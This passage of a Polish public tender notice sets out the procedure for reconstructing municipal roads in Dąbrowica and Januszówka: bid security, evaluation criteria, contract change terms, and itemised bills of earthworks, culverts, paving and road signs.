              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">OŚWIADCZENIE O SPEŁNIANIU WARUNKÓW ORAZ NIEPODLEGANIU WYKLUCZENIU.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />OŚWIADCZENIE O SPEŁNIANIU WARUNKÓW ORAZ NIEPODLEGANIU WYKLUCZENIU<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">OŚWIADCZENIE O SPEŁNIANIU WARUNKÓW ORAZ NIEPODLEGANIU WYKLUCZENIU.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W zakresie zadania nr 1:
W zakresie zadania nr 2:
W zakresie zadania nr 3:
2. listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Ustawy, albo informację o tym, że nie należy do grupy kapitałowej.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca zobowiązany jest wnieść wadium w wysokości:

3500.00 zł w zakresie zadania nr 1
11000.00 zł w zakresie zadania nr 2
1500.00 zł w zakresie zadania nr 3

Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas gdy przed upływem terminu składania ofert kwota wniesionego wadium będzie uznana na rachunku bankowym Zamawiającego. Zaleca się, aby kopię dowodu wniesienia wadium załączyć do oferty.
Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu:
przelewem na rachunek bankowy Zamawiającego: 86 8557 0009 0300 0172 2003 0011
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Zwrot lub zatrzymanie wadium następuje na zasadach określonych w art. 46 Ustawy.

Wadium wnoszone w innej niż pieniądz formie musi posiadać ważność co najmniej do końca terminu związania wykonawcy złożoną przez niego ofertą.

W przypadku wniesienia wadium w innej formie niż pieniądz należy załączyć do oferty odpowiedni dokument, nie spięty w całość z ofertą.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Wykonawca ma prawo żądania przedłużenia umownego terminu w przypadku:

a)	jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi zamawiający, w szczególności będą następstwem nieterminowego przekazania terenu budowy, konieczności zmian dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót,
b)	gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które wykonawca ponosi odpowiedzialność,
c)	gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,
d)	wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które wykonawca ponosi odpowiedzialność,
e)	gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które wykonawca ponosi odpowiedzialność,
f)	 jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od wykonawcy,
g) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami.
g)	terminów określonych w ustawie Prawo zamówień publicznych
h)	zmiany podwykonawcy lub dalszego podwykonawcy w przypadku akceptacji przez zamawiającego.

2.	Wykonawca swoje żądanie przedłużenia umownego terminu wykonania zamówienia przedkłada Zamawiającemu pisemnie podając nowy termin zakończenia zamówienia wraz z uzasadnieniem faktycznym.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/09/2016, godzina: 09:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI  DĄBROWICA  DĄBROWICA KOLONIA OD KM 0+000 DO KM 0+500<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres robót obejmuje:

I	ROBOTY POMIAROWE

1	Roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym		                                                                                                                 - 0,512 km

2	Inwentaryzacja powykonawcza		                                                       -1,000 kpl



II	ODWODNIENIE

3	Przepusty rurowe  - ława fundamentowa betonowa		                                 - 3,60 m3

4	Przepusty rurowe - rury karbowane PP o śr. 80 cm wraz z zasypka i obsypką	-12,00 m

5	Umocnienie skarp kanałów narzutem kamiennym  na betonie		        -   35,00 m2

6	Przepusty rurowe pod zjazdami - ława fundamentowa żwirowa		          -  0,720 m3

7	Przepusty rurowe pod zjazdami - rury PCV o śr. 40 cm		                       -  6,000 m



III. 	PODBUDOWA

8	Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni 

            w gruncie kat. V-VI		                                                                 - 2315,0 m2

9	Podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm	

                                                  	                                                                -  2263,80 m2

10	Podbudowa z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 5 cm		                                                                                                                  - 2263,80 m2

IV.	URZĄDZENIA BEZPIECZEŃSTWA RUCHU

11	Słupki do znaków drogowych z rur stalowych o śr. 50 mm		            -4,00 szt.

12	Przymocowanie tablic znaków drogowych zakazu, ostrzegawczych,

             informacyjnych   o powierzchni do       0.3 m2				-4,00 szt.

13	Bariery ochronne stalowe jednostronne o masie  24.0 kg/m  		- 24,00 m



V	NAWIERZCHNIA

14	Nawierzchnia z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa 

            ścieralna asfaltowa - grubość po zagęszcz. 5 cm	                                   -2059,00 m2



VI	ZJAZDY

15	Nawierzchnia gruntowa z mieszanek piaszczysto-gliniastych na piaszczystym gruncie rodzimym - grubość warstwy po zagęszczeniu 20 cm	   	                       - 120,00 m2



VII	ROBOTY WYKOŃCZENIOWE

16	Wykonanie poboczy - grubość warstwy po zag. 15cm		          - 768,00 m2

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45100000-8,
                    45200000-9,
                    45233214-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  128132.66<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>PRZEBUDOWA DROGI GMINNEJ W MIEJSCOWOŚCI JANUSZÓWKA <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres robót obejmuje

1)	Odcinek o długości 789 mb



I. ROBOTY PRZYGOTOWAWCZE 

1	Roboty pomiarowe przy liniowych robotach ziemnych (drogach), w terenie: równinnym	km	0,789

2	Inwentaryzacja geodezyjna wykonana w dwóch egzemplarzach	szt.	1,000

3	Rozebranie nawierzchni grubości 5 cm z mas mineralno-bitumicznych, wykonane ręcznie - wraz z wywozem i utylizacją gruzu - dowiązanie projektowanej drogi do drogi istniejącej nawierzchni bitumicznej	m2	11,100

4	Mechaniczne karczowanie krzaków i podszycia: gęstych /powyżej 60% powierzchni/ - wraz z utylizacją gałęzi oraz korzeni	ha	0,045

5	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 46-55 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	11,000

6	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 56-65 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	6,000

7	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 76-100 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	6,000

8	Wykopy z załadunkiem ręcznym i transportem urobku na odl.do 1 km samochodem samowyład. do 5 t /kat. I-II/ - wykopy pod rury osłonowe i kanały technologiczne	m3	11,520

9	Układanie w wykopie rur ochronnych typu AROT, o średnicy 110 mm na sieciach teletechnicznych	m	24,000

10	Zasypywanie wykopów o szer. 0,8-2,5 m, o ścianach pionowych, przy głęb.wykopu do 1,5 m, warstwami grub. 20 cm, z zagęszczeniem ręcznym materiałem dowiezionym (Po, Pr) wraz z zakupem materiału	m3	11,520

II. ROBOTY ZIEMNE 

11	Usunięcie warstwy ziemi urodzajnej (humusu), przy grubości warstwy: do 20 cm wraz z wywozem urobku na odl. do 10 km	m2	1420,200

12	Koryta na całej szerokości jezdni, wykonane mechanicznie przy użyciu równiarki, w gruncie kat.II-VI, przy głębokości koryta do 30 cm i zagęszczeniu walcem wibracyjnym, wraz z odwozem urobku na odl. do 10km (40% urobku do wbudowania w nasypy - poszerzenie korony drogi i pobocza)	m2	3440,700

13	Formowanie nasypów warstwami o grub. 20 cm z zagęszczaniem mechanicznym - nasypy z gruntu pozyskanego z koryta	m3	142,900

14	Formowanie nasypów wraz z zagęszczeniem-, korekta niwelety, uzupełnienie i wyrównanie poboczy -grunt dowieziony(Po,Pr,Ps), wraz z zakupem i transportem materiału	m3	398,800

15	Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane w gruncie kat.II-VI mechanicznie - zagęszczanie walcem wibracyjnym	m2	3440,700

III. PODBUDOWY 

16	Warstwy odcinające zagęszczane mechanicznie, przy grubości warstwy piasku(Po, Pr, Ż) po zagęszczeniu 10 cm - warstwa odsączająca	m2	3440,700

17	Podbudowy z kruszywa łamanego 0-31,5mm (melafir,bazalt,granit), przy grubości dolnej warstwy po zagęszczeniu 15 cm	m2	3440,700

IV. NAWIERZCHNIE 

18	Warstwa ścieralna nawierzchni, wykonana z mieszanek mineralno-bitumicznych AC11S dla KR1, przy grubości warstwy po zagęszczeniu 4 cm	m2	3205,000

V. ODWODNIENIE DROGI 

19	Roboty ziemne wykonywane koparkami podsiębiernymi, z transportem urobku samochodami samowyładowczymi na odległość do 1 km, przy pojemności łyżki koparki: 0,40 m3 /grunt kat. I-II/- odbudowa rowu wzdłuż istn. drogi powiatowej na długości 100mb.	m3	45,000

20	Roboty ziemne wykonywane koparkami przedsiębiernymi, z transportem urobku samochodami samowyładowczymi na odległość do 1 km, przy pojemności łyżki koparki: 0,60 m3 /grunt kat. I-II i samochód do 5 t/-wykpoy pod przepusty	m3	14,900

21	Ławy fundamentowe przepustów rurowych pod drogą wykonane z betonu C8/10	m3	3,000

22	Przepusty rurowe pod drogą gminną, wykonane z rur PEHD o średnicy 50 cm	m	30,000

23	Ścianki czołowe przepustów rurowych pod drogą, przy średnicy rur 50 cm z betonu - ścianki prefabrykowane	szt	4,000

24	Zasypywanie wykopów o szer. 0,8-2,5 m, o ścianach pionowych, przy głęb.wykopu do 1,5 m, warstwami grub. 20 cm, z zagęszczeniem ręcznym-grunt dowieziony(Po,Pr,Ps), wraz z zakupem materiału-przepusty pod drogą	m3	42,700



VI. ROBOTY WYKOŃCZENIOWE i ELEMENTY BEZPIECZEŃSTWA 

25	Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów, w gruncie: kat. I-III	m2	2367,000

26	Uzupełnienie poboczy miesznką optymalną, grubość w-wy po zagęszczeniu 10 cm wraz z zakupem i dowozem materiału	m2	1578,000

27	Słupki pionowych znaków drogowych z rur stalowych o średnicy 50 mm	     szt	11,000

28	Tablice znaków drogowych zakazu, nakazu, ostrzegawczych i informacyjnych o powierzchni ponad 0,3 m2	szt	12,000



2)	Odcinek 755 mb



1	I. ROBOTY PRZYGOTOWAWCZE - KOD CPV 45100000-8 

1	Roboty pomiarowe przy liniowych robotach ziemnych (drogach), w terenie: równinnym	km	0,755

2	Inwentaryzacja godezyjna wykonana w dwóch egzemplarzach	szt.	1,000

3	Mechaniczne karczowanie krzaków i podszycia: gęstych /powyżej 60% powierzchni/ - wraz z utylizacją gałęzi oraz korzeni	ha	0,030

4	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 46-55 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	9,000

5	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 56-65 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	4,000

6	Ścinka drzew wraz z karczowaniem pni koparką podsiębierną w gruntach kat. I-II, o średnicy: 76-100 cm /grunt o normalnej wilgotności/ - wraz z zasypaniem dołów materiałem dowiezionym (Po, Pr, Ps) wraz z zakupem i zagęszczaniem warstwami	szt	5,000

7	Wykopy z załadunkiem ręcznym i transportem urobku na odl.do 1 km samochodem samowyład. do 5 t /kat. I-II/ - wykopy pod rury osłonowe i kanały technologiczne	m3	14,900

8	Układanie w wykopie rur ochronnych typu AROT, o średnicy 110 mm na sieciach teletechnicznych	m	36,000

9	Zasypywanie wykopów o szer. 0,8-2,5 m, o ścianach pionowych, przy głęb.wykopu do 1,5 m, warstwami grub. 20 cm, z zagęszczeniem ręcznym materiałem dowiezionym (Po, Pr) wraz z zakupem materiału	m3	14,900

2	II. ROBOTY ZIEMNE - KOD CPV 45121006-6

10	Usunięcie warstwy ziemi urodzajnej (humusu), przy grubości warstwy: do 20 cm wraz z wywozem urobku na odl. do 10 km	m2	1132,500

11	Koryta na całej szerokości jezdni, wykonane mechanicznie przy użyciu równiarki, w gruncie kat.II-VI, przy głębokości koryta do 30 cm i zagęszczeniu walcem wibracyjnym, wraz z odwozem urobku na odl. do 10km (40% urobku do wbudowania w nasypy - poszerzenie korony drogi i pobocza)	m2	3246,500

12	Formowanie nasypów warstwami o grub. 20 cm z zagęszczaniem mechanicznym - nasypy z gruntu pozyskanego z koryta	m3	129,800

13	Formowanie nasypów wraz z zagęszczeniem-, korekta niwelety, uzupełnienie i wyrównanie poboczy -grunt dowieziony(Po,Pr,Ps), wraz z zakupem i transportem materiału	m3	365,700

14	Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, wykonane w gruncie kat.II-VI mechanicznie - zagęszczanie walcem wibracyjnym	m2	3246,500

3	III. PODBUDOWY - KOD CPV 45233220-7

15	Warstwy odcinające zagęszczane mechanicznie, przy grubości warstwy piasku(Po, Pr, Ż) po zagęszczeniu 10 cm - warstwa odsączająca	m2	3246,500

16	Podbudowy z kruszywa łamanego 0-31,5mm (melafir,bazalt,granit), przy grubości dolnej warstwy po zagęszczeniu 15 cm	m2	3246,500

4	IV. NAWIERZCHNIE - KOD CPV 45233220-7 

17	Warstwa ścieralna nawierzchni, wykonana z mieszanek mineralno-bitumicznych AC11S dla KR1, przy grubości warstwy po zagęszczeniu 4 cm	m2	3020,000

5	V. ROBOTY WYKOŃCZENIOWE i ELEMENTY BEZPIECZEŃSTWA - KOD CPV 452333140-2

18	Plantowanie (obrobienie na czysto) powierzchni skarp i korony nasypów, w gruncie: kat. I-III	m2	2265,000

19	Uzupełnienie poboczy mieszanką optymalną , grubość w-wy po zagęszczeniu 10 cm wraz z zakupem i dowozem materiału	m2	1510,000

20	Bariery ochronne stalowe na łukach  N2W5	m	32,000

21	Zakończenia barier stalowych  N2W5	szt	4,000

22	Słupki pionowych znaków drogowych z rur stalowych o średnicy 50 mm	szt	2,000

